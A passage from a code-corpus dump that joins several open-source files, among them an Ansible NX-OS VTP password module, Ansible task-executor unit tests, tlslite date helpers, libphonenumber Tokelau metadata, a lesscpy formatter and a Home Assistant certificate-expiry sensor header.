# ENSURE VTP PASSWORD IS SET
- nxos_vtp_password:
    vtp_password: ntc
    state: present
    host: "{{ inventory_hostname }}"
    username: "{{ un }}"
    password: "{{ pwd }}"

# ENSURE VTP PASSWORD IS REMOVED
- nxos_vtp_password:
    vtp_password: ntc
    state: absent
    host: "{{ inventory_hostname }}"
    username: "{{ un }}"
    password: "{{ pwd }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"vtp_password": "new_ntc"}
existing:
description:
- k/v pairs of existing vtp
returned: always
type: dict
sample: {"domain": "ntc", "version": "1", "vtp_password": "ntc"}
end_state:
description: k/v pairs of vtp after module execution
returned: always
type: dict
sample: {"domain": "ntc", "version": "1", "vtp_password": "new_ntc"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["vtp password new_ntc"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from ansible.module_utils.nxos import load_config, run_commands
from ansible.module_utils.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
import re
def execute_show_command(command, module, command_type='cli_show'):
    """Run a single show command on the device and return its parsed output.

    ``status`` commands ('show vtp status') are requested as raw text so the
    callers can regex-parse them; everything else is requested as JSON.
    ``command_type`` is unused in the body but kept for call compatibility.
    """
    output = 'text' if 'status' in command else 'json'
    return run_commands(module, [{
        'command': command,
        'output': output,
    }])
def flatten_list(command_lists):
    """Flatten one level of nesting: list items are spliced in, scalars kept."""
    flattened = []
    for entry in command_lists:
        flattened.extend(entry if isinstance(entry, list) else [entry])
    return flattened
def apply_key_map(key_map, table):
    """Return a dict with ``table``'s keys renamed through ``key_map``.

    Keys absent from ``key_map`` (or mapped to a falsy name) are dropped.
    Truthy values are normalized to strings; falsy values (None, 0, '') are
    kept unchanged.  The original code re-fetched ``table.get(key)`` for a
    value it already held from ``table.items()``; that redundant lookup is
    removed here with identical behavior.
    """
    new_dict = {}
    for key, value in table.items():
        new_key = key_map.get(key)
        if new_key:
            new_dict[new_key] = str(value) if value else value
    return new_dict
def get_vtp_config(module):
    """Parse 'show vtp status' text output into a dict.

    Returns {'domain', 'version', 'vtp_password'} when both the domain and
    the running version can be extracted, otherwise an empty dict.
    """
    body = execute_show_command('show vtp status', module)[0]
    vtp_parsed = {}
    if body:
        def _extract(pattern, group):
            # re.match may return None when the field is missing; the
            # AttributeError from .groupdict() then maps to ''.
            found = re.match(pattern, body, re.DOTALL)
            try:
                return found.groupdict()[group]
            except AttributeError:
                return ''
        version = _extract(r'.*VTP version running\s+:\s+(?P<version>\d).*',
                           'version')
        domain = _extract(r'.*VTP Domain Name\s+:\s+(?P<domain>\S+).*',
                          'domain')
        if domain and version:
            vtp_parsed['domain'] = domain
            vtp_parsed['version'] = version
            vtp_parsed['vtp_password'] = get_vtp_password(module)
    return vtp_parsed
def get_vtp_password(module):
    """Return the configured VTP password as a string, or '' if unset.

    'show vtp password' is fetched as JSON; some platforms omit the
    'passwd' key entirely when no password is configured, so ``.get()``
    is used instead of direct indexing to avoid a KeyError.
    """
    body = execute_show_command('show vtp password', module)[0]
    password = body.get('passwd')
    if password:
        return str(password)
    else:
        return ""
def main():
    """Entry point: reconcile the device's VTP password with the desired state."""
    argument_spec = dict(
        vtp_password=dict(type='str', no_log=True),
        state=dict(choices=['absent', 'present'],
                   default='present'),
    )
    argument_spec.update(nxos_argument_spec)
    module = AnsibleModule(argument_spec=argument_spec,
                           supports_check_mode=True)
    warnings = list()
    check_args(module, warnings)
    # Normalize empty string to None so it drops out of 'proposed' below.
    vtp_password = module.params['vtp_password'] or None
    state = module.params['state']
    existing = get_vtp_config(module)
    end_state = existing
    args = dict(vtp_password=vtp_password)
    changed = False
    # 'proposed' holds only the options the caller actually supplied;
    # 'delta' is what differs from the device's current config.
    proposed = dict((k, v) for k, v in args.items() if v is not None)
    delta = dict(set(proposed.items()).difference(existing.items()))
    commands = []
    if state == 'absent':
        if vtp_password is not None:
            # Removal requires the supplied password to match the current one.
            if existing['vtp_password'] == proposed['vtp_password']:
                commands.append(['no vtp password'])
            else:
                module.fail_json(msg="Proposed vtp password doesn't match "
                                     "current vtp password. It cannot be "
                                     "removed when state=absent. If you are "
                                     "trying to change the vtp password, use "
                                     "state=present.")
        else:
            if not existing.get('domain'):
                module.fail_json(msg='Cannot remove a vtp password '
                                     'before vtp domain is set.')
            # NOTE(review): '\\' appears to be the device's sentinel for
            # "no password configured" -- confirm against NX-OS output.
            elif existing['vtp_password'] != ('\\'):
                commands.append(['no vtp password'])
    elif state == 'present':
        if delta:
            if not existing.get('domain'):
                module.fail_json(msg='Cannot set vtp password '
                                     'before vtp domain is set.')
            else:
                commands.append(['vtp password {0}'.format(vtp_password)])
    cmds = flatten_list(commands)
    if cmds:
        if module.check_mode:
            # Check mode: report what would change without touching the device.
            module.exit_json(changed=True, commands=cmds)
        else:
            changed = True
            load_config(module, cmds)
            end_state = get_vtp_config(module)
            if 'configure' in cmds:
                cmds.pop(0)
    results = {}
    results['proposed'] = proposed
    results['existing'] = existing
    results['end_state'] = end_state
    results['updates'] = cmds
    results['changed'] = changed
    results['warnings'] = warnings
    module.exit_json(**results)
# Allow Ansible to execute this module directly.
if __name__ == '__main__':
    main()
| gpl-3.0 |
slohse/ansible | test/units/executor/test_task_executor.py | 11 | 18682 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch, MagicMock
from ansible.errors import AnsibleError, AnsibleParserError
from ansible.executor.task_executor import TaskExecutor, remove_omit
from ansible.playbook.play_context import PlayContext
from ansible.plugins.loader import action_loader, lookup_loader
from ansible.parsing.yaml.objects import AnsibleUnicode
from units.mock.loader import DictDataLoader
class TestTaskExecutor(unittest.TestCase):
    """Unit tests for TaskExecutor: construction, the run() flow, loop-item
    handling, item squashing, task execution and async-result polling.
    All collaborators (host, task, play context, loaders, queue) are mocked.
    """
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def test_task_executor_init(self):
        # Construction alone must succeed with fully mocked collaborators.
        fake_loader = DictDataLoader({})
        mock_host = MagicMock()
        mock_task = MagicMock()
        mock_play_context = MagicMock()
        mock_shared_loader = MagicMock()
        new_stdin = None
        job_vars = dict()
        mock_queue = MagicMock()
        te = TaskExecutor(
            host=mock_host,
            task=mock_task,
            job_vars=job_vars,
            play_context=mock_play_context,
            new_stdin=new_stdin,
            loader=fake_loader,
            shared_loader_obj=mock_shared_loader,
            final_q=mock_queue,
        )
    def test_task_executor_run(self):
        # run() is exercised for: no loop, empty loop, a populated loop, and
        # a loop-item lookup that raises (which must surface as 'failed').
        fake_loader = DictDataLoader({})
        mock_host = MagicMock()
        mock_task = MagicMock()
        mock_task._role._role_path = '/path/to/role/foo'
        mock_play_context = MagicMock()
        mock_shared_loader = MagicMock()
        mock_queue = MagicMock()
        new_stdin = None
        job_vars = dict()
        te = TaskExecutor(
            host=mock_host,
            task=mock_task,
            job_vars=job_vars,
            play_context=mock_play_context,
            new_stdin=new_stdin,
            loader=fake_loader,
            shared_loader_obj=mock_shared_loader,
            final_q=mock_queue,
        )
        te._get_loop_items = MagicMock(return_value=None)
        te._execute = MagicMock(return_value=dict())
        res = te.run()
        te._get_loop_items = MagicMock(return_value=[])
        res = te.run()
        te._get_loop_items = MagicMock(return_value=['a', 'b', 'c'])
        te._run_loop = MagicMock(return_value=[dict(item='a', changed=True), dict(item='b', failed=True), dict(item='c')])
        res = te.run()
        # An AnsibleError while fetching loop items must produce a failure result.
        te._get_loop_items = MagicMock(side_effect=AnsibleError(""))
        res = te.run()
        self.assertIn("failed", res)
    def test_task_executor_get_loop_items(self):
        # with_items via the real lookup_loader should pass items through as-is.
        fake_loader = DictDataLoader({})
        mock_host = MagicMock()
        mock_task = MagicMock()
        mock_task.loop_with = 'items'
        mock_task.loop = ['a', 'b', 'c']
        mock_play_context = MagicMock()
        mock_shared_loader = MagicMock()
        mock_shared_loader.lookup_loader = lookup_loader
        new_stdin = None
        job_vars = dict()
        mock_queue = MagicMock()
        te = TaskExecutor(
            host=mock_host,
            task=mock_task,
            job_vars=job_vars,
            play_context=mock_play_context,
            new_stdin=new_stdin,
            loader=fake_loader,
            shared_loader_obj=mock_shared_loader,
            final_q=mock_queue,
        )
        items = te._get_loop_items()
        self.assertEqual(items, ['a', 'b', 'c'])
    def test_task_executor_run_loop(self):
        # _run_loop should produce one result per item.
        items = ['a', 'b', 'c']
        fake_loader = DictDataLoader({})
        mock_host = MagicMock()
        def _copy(exclude_parent=False, exclude_tasks=False):
            # Each loop iteration copies the task; return a fresh mock per copy.
            new_item = MagicMock()
            return new_item
        mock_task = MagicMock()
        mock_task.copy.side_effect = _copy
        mock_play_context = MagicMock()
        mock_shared_loader = MagicMock()
        mock_queue = MagicMock()
        new_stdin = None
        job_vars = dict()
        te = TaskExecutor(
            host=mock_host,
            task=mock_task,
            job_vars=job_vars,
            play_context=mock_play_context,
            new_stdin=new_stdin,
            loader=fake_loader,
            shared_loader_obj=mock_shared_loader,
            final_q=mock_queue,
        )
        def _execute(variables):
            # Echo the loop item back so results can be counted.
            return dict(item=variables.get('item'))
        te._squash_items = MagicMock(return_value=items)
        te._execute = MagicMock(side_effect=_execute)
        res = te._run_loop(items)
        self.assertEqual(len(res), 3)
    def test_task_executor_squash_items(self):
        # _squash_items collapses a with_items loop over a package module
        # (e.g. yum) into a single invocation with a list of names -- but only
        # in the safe cases.  The first half checks cases that must NOT be
        # squashed; the 'Replaces' section checks cases that must.
        items = ['a', 'b', 'c']
        fake_loader = DictDataLoader({})
        mock_host = MagicMock()
        loop_var = 'item'
        def _evaluate_conditional(templar, variables):
            # Late-bound closure over loop_var: item 'b' is skipped by its
            # when-condition, so squashed results should contain only a and c.
            item = variables.get(loop_var)
            if item == 'b':
                return False
            return True
        mock_task = MagicMock()
        mock_task.evaluate_conditional.side_effect = _evaluate_conditional
        mock_play_context = MagicMock()
        mock_shared_loader = None
        mock_queue = MagicMock()
        new_stdin = None
        job_vars = dict(pkg_mgr='yum')
        te = TaskExecutor(
            host=mock_host,
            task=mock_task,
            job_vars=job_vars,
            play_context=mock_play_context,
            new_stdin=new_stdin,
            loader=fake_loader,
            shared_loader_obj=mock_shared_loader,
            final_q=mock_queue,
        )
        # No replacement
        mock_task.action = 'yum'
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, ['a', 'b', 'c'])
        self.assertIsInstance(mock_task.args, MagicMock)
        mock_task.action = 'foo'
        mock_task.args = {'name': '{{item}}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, ['a', 'b', 'c'])
        self.assertEqual(mock_task.args, {'name': '{{item}}'})
        mock_task.action = 'yum'
        mock_task.args = {'name': 'static'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, ['a', 'b', 'c'])
        self.assertEqual(mock_task.args, {'name': 'static'})
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{pkg_mgr}}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, ['a', 'b', 'c'])
        self.assertEqual(mock_task.args, {'name': '{{pkg_mgr}}'})
        mock_task.action = '{{unknown}}'
        mock_task.args = {'name': '{{item}}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, ['a', 'b', 'c'])
        self.assertEqual(mock_task.args, {'name': '{{item}}'})
        # Could do something like this to recover from bad deps in a package
        job_vars = dict(pkg_mgr='yum', packages=['a', 'b'])
        items = ['absent', 'latest']
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{ packages }}', 'state': '{{ item }}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, items)
        self.assertEqual(mock_task.args, {'name': '{{ packages }}', 'state': '{{ item }}'})
        # Maybe should raise an error in this case.  The user would have to specify:
        # - yum: name="{{ packages[item] }}"
        #   with_items:
        #     - ['a', 'b']
        #     - ['foo', 'bar']
        # you can't use a list as a dict key so that would probably throw
        # an error later.  If so, we can throw it now instead.
        # Squashing in this case would not be intuitive as the user is being
        # explicit in using each list entry as a key.
        job_vars = dict(pkg_mgr='yum', packages={"a": "foo", "b": "bar", "foo": "baz", "bar": "quux"})
        items = [['a', 'b'], ['foo', 'bar']]
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{ packages[item] }}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, items)
        self.assertEqual(mock_task.args, {'name': '{{ packages[item] }}'})
        # Replaces
        items = ['a', 'b', 'c']
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{item}}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, [['a', 'c']])
        self.assertEqual(mock_task.args, {'name': ['a', 'c']})
        mock_task.action = '{{pkg_mgr}}'
        mock_task.args = {'name': '{{item}}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        self.assertEqual(new_items, [['a', 'c']])
        self.assertEqual(mock_task.args, {'name': ['a', 'c']})
        # New loop_var
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{a_loop_var_item}}'}
        mock_task.loop_control = {'loop_var': 'a_loop_var_item'}
        loop_var = 'a_loop_var_item'
        new_items = te._squash_items(items=items, loop_var='a_loop_var_item', variables=job_vars)
        self.assertEqual(new_items, [['a', 'c']])
        self.assertEqual(mock_task.args, {'name': ['a', 'c']})
        # Restore loop_var so the conditional closure reads 'item' again.
        loop_var = 'item'
        #
        # These are presently not optimized but could be in the future.
        # Expected output if they were optimized is given as a comment
        # Please move these to a different section if they are optimized
        #
        # Squashing lists
        job_vars = dict(pkg_mgr='yum')
        items = [['a', 'b'], ['foo', 'bar']]
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{ item }}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        # self.assertEqual(new_items, [['a', 'b', 'foo', 'bar']])
        # self.assertEqual(mock_task.args, {'name': ['a', 'b', 'foo', 'bar']})
        self.assertEqual(new_items, items)
        self.assertEqual(mock_task.args, {'name': '{{ item }}'})
        # Retrieving from a dict
        items = ['a', 'b', 'foo']
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{ packages[item] }}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        # self.assertEqual(new_items, [['foo', 'baz']])
        # self.assertEqual(mock_task.args, {'name': ['foo', 'baz']})
        self.assertEqual(new_items, items)
        self.assertEqual(mock_task.args, {'name': '{{ packages[item] }}'})
        # Another way to retrieve from a dict
        job_vars = dict(pkg_mgr='yum')
        items = [{'package': 'foo'}, {'package': 'bar'}]
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{ item["package"] }}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        # self.assertEqual(new_items, [['foo', 'bar']])
        # self.assertEqual(mock_task.args, {'name': ['foo', 'bar']})
        self.assertEqual(new_items, items)
        self.assertEqual(mock_task.args, {'name': '{{ item["package"] }}'})
        items = [
            dict(name='a', state='present'),
            dict(name='b', state='present'),
            dict(name='c', state='present'),
        ]
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{item.name}}', 'state': '{{item.state}}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        # self.assertEqual(new_items, [dict(name=['a', 'b', 'c'], state='present')])
        # self.assertEqual(mock_task.args, {'name': ['a', 'b', 'c'], 'state': 'present'})
        self.assertEqual(new_items, items)
        self.assertEqual(mock_task.args, {'name': '{{item.name}}', 'state': '{{item.state}}'})
        items = [
            dict(name='a', state='present'),
            dict(name='b', state='present'),
            dict(name='c', state='absent'),
        ]
        mock_task.action = 'yum'
        mock_task.args = {'name': '{{item.name}}', 'state': '{{item.state}}'}
        new_items = te._squash_items(items=items, loop_var='item', variables=job_vars)
        # self.assertEqual(new_items, [dict(name=['a', 'b'], state='present'),
        #         dict(name='c', state='absent')])
        # self.assertEqual(mock_task.args, {'name': '{{item.name}}', 'state': '{{item.state}}'})
        self.assertEqual(new_items, items)
        self.assertEqual(mock_task.args, {'name': '{{item.name}}', 'state': '{{item.state}}'})
    def test_task_executor_execute(self):
        # Drive _execute() through several task configurations (changed_when,
        # failed_when, skipped conditional, and an include action).
        fake_loader = DictDataLoader({})
        mock_host = MagicMock()
        mock_task = MagicMock()
        mock_task.args = dict()
        mock_task.retries = 0
        mock_task.delay = -1
        mock_task.register = 'foo'
        mock_task.until = None
        mock_task.changed_when = None
        mock_task.failed_when = None
        mock_task.post_validate.return_value = None
        # mock_task.async_val cannot be left unset, because on Python 3 MagicMock()
        # > 0 raises a TypeError   There are two reasons for using the value 1
        # here: on Python 2 comparing MagicMock() > 0 returns True, and the
        # other reason is that if I specify 0 here, the test fails. ;)
        mock_task.async_val = 1
        mock_task.poll = 0
        mock_play_context = MagicMock()
        mock_play_context.post_validate.return_value = None
        mock_play_context.update_vars.return_value = None
        mock_connection = MagicMock()
        mock_connection.set_host_overrides.return_value = None
        mock_connection._connect.return_value = None
        mock_action = MagicMock()
        mock_queue = MagicMock()
        shared_loader = None
        new_stdin = None
        job_vars = dict(omit="XXXXXXXXXXXXXXXXXXX")
        te = TaskExecutor(
            host=mock_host,
            task=mock_task,
            job_vars=job_vars,
            play_context=mock_play_context,
            new_stdin=new_stdin,
            loader=fake_loader,
            shared_loader_obj=shared_loader,
            final_q=mock_queue,
        )
        te._get_connection = MagicMock(return_value=mock_connection)
        te._get_action_handler = MagicMock(return_value=mock_action)
        mock_action.run.return_value = dict(ansible_facts=dict())
        res = te._execute()
        mock_task.changed_when = MagicMock(return_value=AnsibleUnicode("1 == 1"))
        res = te._execute()
        mock_task.changed_when = None
        mock_task.failed_when = MagicMock(return_value=AnsibleUnicode("1 == 1"))
        res = te._execute()
        mock_task.failed_when = None
        mock_task.evaluate_conditional.return_value = False
        res = te._execute()
        mock_task.evaluate_conditional.return_value = True
        mock_task.args = dict(_raw_params='foo.yml', a='foo', b='bar')
        mock_task.action = 'include'
        res = te._execute()
    def test_task_executor_poll_async_result(self):
        # _poll_async_result must fail on malformed async results and return
        # the final result dict once the async job reports finished.
        fake_loader = DictDataLoader({})
        mock_host = MagicMock()
        mock_task = MagicMock()
        mock_task.async_val = 0.1
        mock_task.poll = 0.05
        mock_play_context = MagicMock()
        mock_connection = MagicMock()
        mock_action = MagicMock()
        mock_queue = MagicMock()
        shared_loader = MagicMock()
        shared_loader.action_loader = action_loader
        new_stdin = None
        job_vars = dict(omit="XXXXXXXXXXXXXXXXXXX")
        te = TaskExecutor(
            host=mock_host,
            task=mock_task,
            job_vars=job_vars,
            play_context=mock_play_context,
            new_stdin=new_stdin,
            loader=fake_loader,
            shared_loader_obj=shared_loader,
            final_q=mock_queue,
        )
        te._connection = MagicMock()
        def _get(*args, **kwargs):
            mock_action = MagicMock()
            mock_action.run.return_value = dict(stdout='')
            return mock_action
        # testing with some bad values in the result passed to poll async,
        # and with a bad value returned from the mock action
        with patch.object(action_loader, 'get', _get):
            mock_templar = MagicMock()
            res = te._poll_async_result(result=dict(), templar=mock_templar)
            self.assertIn('failed', res)
            res = te._poll_async_result(result=dict(ansible_job_id=1), templar=mock_templar)
            self.assertIn('failed', res)
        def _get(*args, **kwargs):
            mock_action = MagicMock()
            mock_action.run.return_value = dict(finished=1)
            return mock_action
        # now testing with good values
        with patch.object(action_loader, 'get', _get):
            mock_templar = MagicMock()
            res = te._poll_async_result(result=dict(ansible_job_id=1), templar=mock_templar)
            self.assertEqual(res, dict(finished=1))
    def test_recursive_remove_omit(self):
        # remove_omit strips dict entries whose value equals the omit token at
        # any nesting depth, but must leave list elements untouched.
        omit_token = 'POPCORN'
        data = {
            'foo': 'bar',
            'baz': 1,
            'qux': ['one', 'two', 'three'],
            'subdict': {
                'remove': 'POPCORN',
                'keep': 'not_popcorn',
                'subsubdict': {
                    'remove': 'POPCORN',
                    'keep': 'not_popcorn',
                },
                'a_list': ['POPCORN'],
            },
            'a_list': ['POPCORN'],
        }
        expected = {
            'foo': 'bar',
            'baz': 1,
            'qux': ['one', 'two', 'three'],
            'subdict': {
                'keep': 'not_popcorn',
                'subsubdict': {
                    'keep': 'not_popcorn',
                },
                'a_list': ['POPCORN'],
            },
            'a_list': ['POPCORN'],
        }
        self.assertEqual(remove_omit(data, omit_token), expected)
| gpl-3.0 |
theguardian/JIRA-APPy | lib/tlslite/utils/datefuncs.py | 206 | 2278 | # Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.
import os
#Functions for manipulating datetime objects
#CCYY-MM-DDThh:mm:ssZ
def parseDateClass(s):
    """Parse a 'CCYY-MM-DDThh:mm:ssZ' string into a platform date object."""
    year, month, rest = s.split("-")
    # rest is 'DDThh:mm:ssZ': first two chars are the day, the remainder
    # (after the 'T' separator) is the time portion.
    day, tail = rest[:2], rest[2:]
    hour, minute, second = tail[1:].split(":")
    second = second[:2]  # strip the trailing 'Z'
    return createDateClass(int(year), int(month), int(day),
                           int(hour), int(minute), int(second))
# Two implementations of the date helpers: CPython uses datetime; Jython 2.1
# (os.name == "java") lacks the datetime module and uses java.util.Calendar.
if os.name != "java":
    from datetime import datetime, timedelta
    # Helper functions for working with a date/time class
    def createDateClass(year, month, day, hour, minute, second):
        return datetime(year, month, day, hour, minute, second)
    def printDateClass(d):
        # Split off fractional seconds, append 'Z'
        return d.isoformat().split(".")[0]+"Z"
    def getNow():
        return datetime.utcnow()
    def getHoursFromNow(hours):
        return datetime.utcnow() + timedelta(hours=hours)
    def getMinutesFromNow(minutes):
        return datetime.utcnow() + timedelta(minutes=minutes)
    def isDateClassExpired(d):
        return d < datetime.utcnow()
    def isDateClassBefore(d1, d2):
        return d1 < d2
else:
    # Jython 2.1 is missing lots of python 2.3 stuff,
    # which we have to emulate here:
    import java
    import jarray
    def createDateClass(year, month, day, hour, minute, second):
        c = java.util.Calendar.getInstance()
        c.setTimeZone(java.util.TimeZone.getTimeZone("UTC"))
        # java.util.Calendar months are 0-based, hence month-1.
        c.set(year, month-1, day, hour, minute, second)
        return c
    def printDateClass(d):
        return "%04d-%02d-%02dT%02d:%02d:%02dZ" % \
        (d.get(d.YEAR), d.get(d.MONTH)+1, d.get(d.DATE), \
        d.get(d.HOUR_OF_DAY), d.get(d.MINUTE), d.get(d.SECOND))
    def getNow():
        c = java.util.Calendar.getInstance()
        c.setTimeZone(java.util.TimeZone.getTimeZone("UTC"))
        c.get(c.HOUR) #force refresh?
        return c
    def getHoursFromNow(hours):
        d = getNow()
        d.add(d.HOUR, hours)
        return d
    # NOTE(review): the Jython branch defines no getMinutesFromNow
    # counterpart -- confirm no caller needs it on that platform.
    def isDateClassExpired(d):
        n = getNow()
        return d.before(n)
    def isDateClassBefore(d1, d2):
        return d1.before(d2)
| gpl-2.0 |
cgstudiomap/cgstudiomap | main/eggs/phonenumbers-7.1.1-py2.7.egg/phonenumbers/data/region_TK.py | 10 | 1412 | """Auto-generated file, do not edit by hand. TK metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
# Phone number metadata for Tokelau (TK, country code +690).
# NOTE(review): this file is auto-generated by the phonenumbers build tools;
# regenerate rather than hand-editing the patterns below.
PHONE_METADATA_TK = PhoneMetadata(id='TK', country_code=690, international_prefix='00',
    # All TK numbers are 4 digits: 2-4xxx fixed line, 5-9xxx mobile.
    general_desc=PhoneNumberDesc(national_number_pattern='[2-9]\\d{3}', possible_number_pattern='\\d{4}'),
    fixed_line=PhoneNumberDesc(national_number_pattern='[2-4]\\d{3}', possible_number_pattern='\\d{4}', example_number='3010'),
    mobile=PhoneNumberDesc(national_number_pattern='[5-9]\\d{3}', possible_number_pattern='\\d{4}', example_number='5190'),
    # 'NA' patterns mark number categories that do not exist in this region.
    toll_free=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
    no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'))
| agpl-3.0 |
fivethreeo/lesscpy | lesscpy/lessc/formatter.py | 5 | 1090 | # -*- coding: utf8 -*-
"""
.. module:: lesscpy.lessc.formatter
:synopsis: CSS Formatter class.
Copyright (c)
See LICENSE for details.
.. moduleauthor:: Johann T. Mariusson <jtm@robot.is>
"""
class Formatter(object):
    """Render parsed LESS units as CSS text.

    Whitespace placeholders (newline, tab, word-space, end-of-block) are
    chosen from the formatting options and handed to each parse unit's
    ``fmt()`` method.
    """
    def __init__(self, args):
        """Store formatting options.

        ``args`` must provide: ``minify``, ``xminify``, ``tabs``, ``spaces``.
        """
        self.args = args
    def format(self, parse):
        """Return the formatted CSS for ``parse.result``.

        Returns '' when there is nothing to format.  ``xminify`` implies
        ``minify`` but keeps the end-of-block newline suppressed.
        """
        if not parse.result:
            return ''
        eb = '\n'
        if self.args.xminify:
            # Extreme minify: also drop the newline after each block.
            eb = ''
            self.args.minify = True
        if self.args.minify:
            self.items = {
                'nl': '',
                'tab': '',
                'ws': '',
                'eb': eb
            }
        else:
            tab = '\t' if self.args.tabs else ' ' * int(self.args.spaces)
            self.items = {
                'nl': '\n',
                'tab': tab,
                'ws': ' ',
                'eb': eb
            }
        # Falsy units are skipped; each unit renders itself with the chosen
        # whitespace placeholders.
        self.out = [u.fmt(self.items)
                    for u in parse.result
                    if u]
        return ''.join(self.out).strip()
| mit |
lmprice/ansible | test/sanity/validate-modules/test_validate_modules_regex.py | 162 | 2807 | #!/usr/bin/env python
# This is a standalone test for the regex inside validate-modules
# It is not suitable to add to the make tests target because the
# file under test is outside the test's sys.path AND has a hyphen
# in the name making it unimportable.
#
# To execute this by hand:
# 1) cd <checkoutdir>
# 2) source hacking/env-setup
# 3) PYTHONPATH=./lib nosetests -d -w test -v --nocapture sanity/validate-modules
import re
from ansible.compat.tests import unittest
# Iterations the regex went through before reaching its final form:
# TYPE_REGEX = re.compile(r'.*\stype\(.*')
# TYPE_REGEX = re.compile(r'.*(if|or)\stype\(.*')
# TYPE_REGEX = re.compile(r'.*(if|or)(\s+.*|\s+)type\(.*')
# TYPE_REGEX = re.compile(r'.*(if|or)(\s+.*|\s+)type\(.*')
# TYPE_REGEX = re.compile(r'.*(if|\sor)(\s+.*|\s+)type\(.*')
# TYPE_REGEX = re.compile(r'.*(if|\sor)(\s+.*|\s+)(?<!_)type\(.*')
# Final form: flag 'type(...)' comparisons inside an 'if'/'or' expression,
# while the negative lookbehinds exclude names ending in '_type(' and the
# benign 'str(type(' pattern.
TYPE_REGEX = re.compile(r'.*(if|or)(\s+.*|\s+)(?<!_)(?<!str\()type\(.*')
class TestValidateModulesRegex(unittest.TestCase):
    """Exercise TYPE_REGEX against known matching and non-matching lines."""
    def test_type_regex(self):
        # Each entry is (source line, should_match).  The previous loop used
        # enumerate() with an unused index and positional check[0]/check[1]
        # access; plain tuple unpacking is clearer and equivalent.
        checks = [
            ['if type(foo) is Bar', True],
            ['if Bar is type(foo)', True],
            ['if type(foo) is not Bar', True],
            ['if Bar is not type(foo)', True],
            ['if type(foo) == Bar', True],
            ['if Bar == type(foo)', True],
            ['if type(foo)==Bar', True],
            ['if Bar==type(foo)', True],
            ['if type(foo) != Bar', True],
            ['if Bar != type(foo)', True],
            ['if type(foo)!=Bar', True],
            ['if Bar!=type(foo)', True],
            ['if foo or type(bar) != Bar', True],
            ['x = type(foo)', False],
            ["error = err.message + ' ' + str(err) + ' - ' + str(type(err))", False],
            # cloud/amazon/ec2_group.py
            ["module.fail_json(msg='Invalid rule parameter type [%s].' % type(rule))", False],
            # files/patch.py
            ["p = type('Params', (), module.params)", False],  # files/patch.py
            # system/osx_defaults.py
            ["if self.current_value is not None and not isinstance(self.current_value, type(self.value)):", True],
            # system/osx_defaults.py
            ['raise OSXDefaultsException("Type mismatch. Type in defaults: " + type(self.current_value).__name__)', False],
            # network/nxos/nxos_interface.py
            ["if get_interface_type(interface) == 'svi':", False],
        ]
        for cstring, cexpected in checks:
            match = TYPE_REGEX.match(cstring)
            if cexpected and not match:
                assert False, "%s should have matched" % cstring
            elif not cexpected and match:
                assert False, "%s should not have matched" % cstring
| gpl-3.0 |
MungoRae/home-assistant | homeassistant/components/sensor/cert_expiry.py | 13 | 3516 | """
Counter for the days till a HTTPS (TLS) certificate will expire.
For more details about this sensor please refer to the documentation at
https://home-assistant.io/components/sensor.cert_expiry/
"""
import logging
import socket
import ssl
from datetime import datetime, timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
